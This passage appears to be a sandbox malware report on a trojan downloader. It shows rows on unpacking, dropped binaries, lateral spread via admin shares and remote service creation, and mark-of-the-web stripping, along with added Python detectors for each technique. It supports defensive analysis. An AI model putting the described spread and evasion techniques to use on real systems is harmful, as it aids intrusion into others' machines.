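IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def header_intact(image):
    """True if the image still starts with a DOS header that points at a valid
    PE signature. A dump taken after the loader stub has overwritten its own
    header fails this check."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return image[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def section_rights(image):
    """Return [(section name, rights)] with rights spelled as a subset of
    'E', 'R', 'W' (execute, read, write), always in that order. Works on an
    on-disk file or a raw dump of the module base: only headers are read."""
    if not header_intact(image):
        raise ValueError("no usable MZ/PE header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    # IMAGE_FILE_HEADER follows the 4-byte signature: Machine, NumberOfSections,
    # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader,
    # Characteristics. The section table starts right after the optional header.
    nsect = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    first = e_lfanew + 24 + opt_size
    result = []
    for i in range(nsect):
        hdr = image[first + i * 40:first + (i + 1) * 40]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", hdr, 36)[0]   # Characteristics field
        rights = ("E" if chars & IMAGE_SCN_MEM_EXECUTE else "") \
            + ("R" if chars & IMAGE_SCN_MEM_READ else "") \
            + ("W" if chars & IMAGE_SCN_MEM_WRITE else "")
        result.append((name, rights))
    return result


def diff_rights(disk_image, dump_image):
    """List every section whose rights differ between file and dump, plus the
    sections that exist on one side only. An empty list means no change."""
    disk = dict(section_rights(disk_image))
    dump = dict(section_rights(dump_image))
    diffs = []
    for name, rights in dump.items():
        if name not in disk:
            diffs.append(f"{name}: present only in dump ({rights})")
        elif disk[name] != rights:
            diffs.append(f"{name}: disk={disk[name]} dump={rights}")
    diffs.extend(f"{name}: missing from dump" for name in disk if name not in dump)
    return diffs


def build_pe(sections):
    """Constructed minimal PE32 image for the demo: real DOS, NT and section
    headers, a zeroed optional header and no section data."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    sect_tbl = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"), 0, 0, 0, 0, 0, 0, 0, 0, chars)
        for name, chars in sections)
    return dos + b"PE\0\0" + file_hdr + b"\0" * opt_size + sect_tbl


# Constructed stand-ins for the on-disk file and the in-memory dump.
DISK_IMAGE = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])
DUMP_IMAGE = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),   # made writable at run time
    (".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".idata", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),   # sections that exist only
    (".rsrc", IMAGE_SCN_MEM_READ),                          # in the unpacked payload
    (".reloc", IMAGE_SCN_MEM_READ),
])

if __name__ == "__main__":
    for line in diff_rights(DISK_IMAGE, DUMP_IMAGE):
        print(line)
    print("header intact in zeroed dump:", header_intact(b"\0" * 0x200))
```

Section-header characteristics are the declared rights; the rights actually in force are whatever VirtualProtect was last called with, so a clean diff here does not rule out the stub having changed page protections without touching the header. When the header has been overwritten, rebuild it from the dump's section layout (or carve the payload by its own MZ) before running the comparison.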
Detected unpacking (overwrites its own PE header)
Source: C:\Windows\SysWOW64\webservices\clb.exe | Unpacked PE file: 7.2.clb.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\webservices\clb.exe | Unpacked PE file: 9.2.clb.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_004449B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004449B3
Source: clboe.exe.1.dr | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Code function: 0_2_00408070 push eax; ret 0_2_0040809E
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 1_3_02DBBAC4 push FFFFFFB1h; ret 1_3_02DBBAD1
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 1_3_02DBC5F3 push FFFFFFB5h; ret 1_3_02DBC5FD
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 1_3_02DBDC43 push FFFFFFB5h; ret 1_3_02DBDC45
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_004048C5 push ecx; ret 7_2_004048D8
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_1_004048C5 push ecx; ret 7_1_004048D8
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00445190 push eax; ret 8_2_004451A4
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00445190 push eax; ret 8_2_004451CC
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00449EB4 push eax; ret 8_2_00449EC1
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_00444F79 push ecx; ret 8_2_00444F89
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_00445190 push eax; ret 8_1_004451A4
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_00445190 push eax; ret 8_1_004451CC
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_00412341 push ecx; ret 9_2_00412351
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_00412360 push eax; ret 9_2_00412374
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_00412360 push eax; ret 9_2_0041239C
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_00412341 push ecx; ret 9_1_00412351
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_00412360 push eax; ret 9_1_00412374
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_00412360 push eax; ret 9_1_0041239C

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\webservices\clb.exe | Executable created and started: C:\Windows\SysWOW64\webservices\clb.exe
Source: C:\Windows\SysWOW64\webservices\clb.exe | Executable created and started: C:\Windows\SysWOW64\webservices\clboe.exe
Source: C:\Windows\SysWOW64\webservices\clb.exe | File created: C:\Windows\SysWOW64\webservices\clboe.exe
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 1_3_02DB33F0 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
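Function 1_3_02DB33F0 in the row above (it also appears among the code-function rows earlier in this section) chains _snwprintf, WNetAddConnection2W, CopyFileW, OpenSCManagerW, CreateServiceW and StartServiceW: format a UNC path, connect to the share, copy the binary across and register and start it as a service on the target. On the receiving host that sequence leaves an administrative-share access followed within seconds by a service installation. The Python below is an added example, not part of the report, of correlating those two event types. It assumes simplified records carrying the fields of Security event 5140 (share path, source address) and System event 7045 (service name, image path); the log at the bottom is constructed, and the service name is a placeholder because the report does not show one.

```python
from datetime import datetime, timedelta

ADMIN_SHARES = ("ADMIN$", "C$")


def share_name(path):
    """'\\\\*\\ADMIN$' -> 'ADMIN$' (5140 logs the share as \\\\*\\NAME)."""
    return path.rstrip("\\").rsplit("\\", 1)[-1].upper()


def correlate_remote_service_installs(events, window=timedelta(seconds=120)):
    """Pair each service-install event with the most recent administrative
    share access from a remote address inside `window`.

    Events are dicts with 'time' (datetime) and 'id' (Windows event ID):
      5140 network share object accessed: 'share', 'src'
      7045 a service was installed:       'service', 'path'
    Returns one finding per matched install, oldest first."""
    recent = []      # (time, src, share) for admin-share accesses seen so far
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 5140 and share_name(ev["share"]) in ADMIN_SHARES:
            recent.append((ev["time"], ev["src"], share_name(ev["share"])))
        elif ev["id"] == 7045:
            hits = [r for r in recent if ev["time"] - r[0] <= window]
            if hits:
                t, src, share = hits[-1]
                findings.append({
                    "service": ev["service"],
                    "path": ev["path"],
                    "src": src,
                    "share": share,
                    "delay_s": int((ev["time"] - t).total_seconds()),
                })
    return findings


# Constructed log: a remote ADMIN$ write followed by a service pointing at the
# dropped module, then two benign pairs that must not correlate (IPC$ is not an
# admin share; the C$ access is far outside the window).
T0 = datetime(2020, 8, 1, 12, 0, 0)
SAMPLE_LOG = [
    {"time": T0, "id": 5140, "share": r"\\*\ADMIN$", "src": "10.0.0.23"},
    {"time": T0 + timedelta(seconds=4), "id": 7045,
     "service": "clb",                                   # placeholder name
     "path": r"C:\Windows\SysWOW64\webservices\clb.exe"},
    {"time": T0 + timedelta(minutes=30), "id": 5140, "share": r"\\*\IPC$", "src": "10.0.0.23"},
    {"time": T0 + timedelta(minutes=31), "id": 7045,
     "service": "Spooler", "path": r"C:\Windows\System32\spoolsv.exe"},
    {"time": T0 + timedelta(hours=2), "id": 5140, "share": r"\\*\C$", "src": "10.0.0.9"},
    {"time": T0 + timedelta(hours=2, minutes=10), "id": 7045,
     "service": "Backup", "path": r"C:\Program Files\Backup\agent.exe"},
]

if __name__ == "__main__":
    for f in correlate_remote_service_installs(SAMPLE_LOG):
        print(f"{f['src']} wrote to {f['share']}, service {f['service']!r} "
              f"installed {f['delay_s']}s later from {f['path']}")
```

Event 5140 is only produced when "Audit File Share" is enabled, and Security event 4697 is the equivalent of 7045 when "Audit Security System Extension" is on; feed whichever your hosts log. Tighten the window to what PsExec-style tooling needs on your network rather than leaving it at the two minutes used here.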

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | File opened: C:\Windows\SysWOW64\webservices\clb.exe:Zone.Identifier read attributes | delete
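The row above is the mark-of-the-web being stripped: the sample opens the Zone.Identifier alternate data stream of the dropped clb.exe with DELETE access, so SmartScreen and the Office/Explorer "file from the Internet" checks no longer apply to it. The Python below is an added example, not part of the report, showing what that stream contains, how to read it through the `path:Zone.Identifier` stream syntax, and how to flag the delete-access pattern in a file-access event. The stream text and the event are constructed; the event reuses the path and access mask from the row above.

```python
import configparser

# Zone identifiers used by urlmon's URL security zones.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


def parse_zone_identifier(text):
    """Parse the text of a Zone.Identifier alternate data stream.

    The stream is INI-formatted: a [ZoneTransfer] section whose ZoneId says
    where the file came from; browsers usually add ReferrerUrl and HostUrl.
    Returns None when the text carries no [ZoneTransfer] section."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text.replace("\r\n", "\n"))
    if not cp.has_section("ZoneTransfer"):
        return None
    zt = cp["ZoneTransfer"]
    zone_id = zt.getint("ZoneId", fallback=None)
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
        "referrer_url": zt.get("ReferrerUrl", fallback=None),
        "host_url": zt.get("HostUrl", fallback=None),
    }


def read_zone_identifier(path):
    """Read and parse the Zone.Identifier stream of a file on NTFS.

    Appending ':Zone.Identifier' is the Windows syntax for opening an alternate
    data stream. On non-NTFS volumes, or once the stream has been deleted as
    the sample does to clb.exe, the open fails and None is returned."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


def is_motw_removal(event):
    """Flag a file-access event that opens a Zone.Identifier stream with DELETE
    access, which is how the mark-of-the-web is stripped from a dropped file.
    `event` mirrors the report's 'File opened' rows: a path and an access list."""
    path = event.get("path", "")
    access = {a.strip().lower() for a in event.get("access", "").split("|")}
    return path.lower().endswith(":zone.identifier") and "delete" in access


# Constructed inputs: a typical browser-written stream and the access event
# from the row above.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/mail/attachment\r\n"
    "HostUrl=https://example.invalid/files/invoice.exe\r\n"
)
SAMPLE_EVENT = {
    "path": r"C:\Windows\SysWOW64\webservices\clb.exe:Zone.Identifier",
    "access": "read attributes | delete",
}

if __name__ == "__main__":
    print(parse_zone_identifier(SAMPLE_STREAM))
    print("MOTW removal:", is_motw_removal(SAMPLE_EVENT))
    print("stream on this host:", read_zone_identifier(r"C:\Windows\SysWOW64\webservices\clb.exe"))
```

Note the limits of the signal: a file written by a process that never had the mark (the sample itself wrote clb.exe) would simply have no stream to delete, so absence of Zone.Identifier is not evidence of removal on its own; the DELETE open on the stream is the observable action. Sysmon Event ID 15 (FileCreateStreamHash) records stream creation, not deletion, so the delete has to come from file-access auditing or an EDR file-open telemetry source.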
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 7_2_004038A5 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004038A5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\webservices\clb.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\webservices\clb.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\webservices\clb.exe | Process information set: NOOPENFILEERRORBOX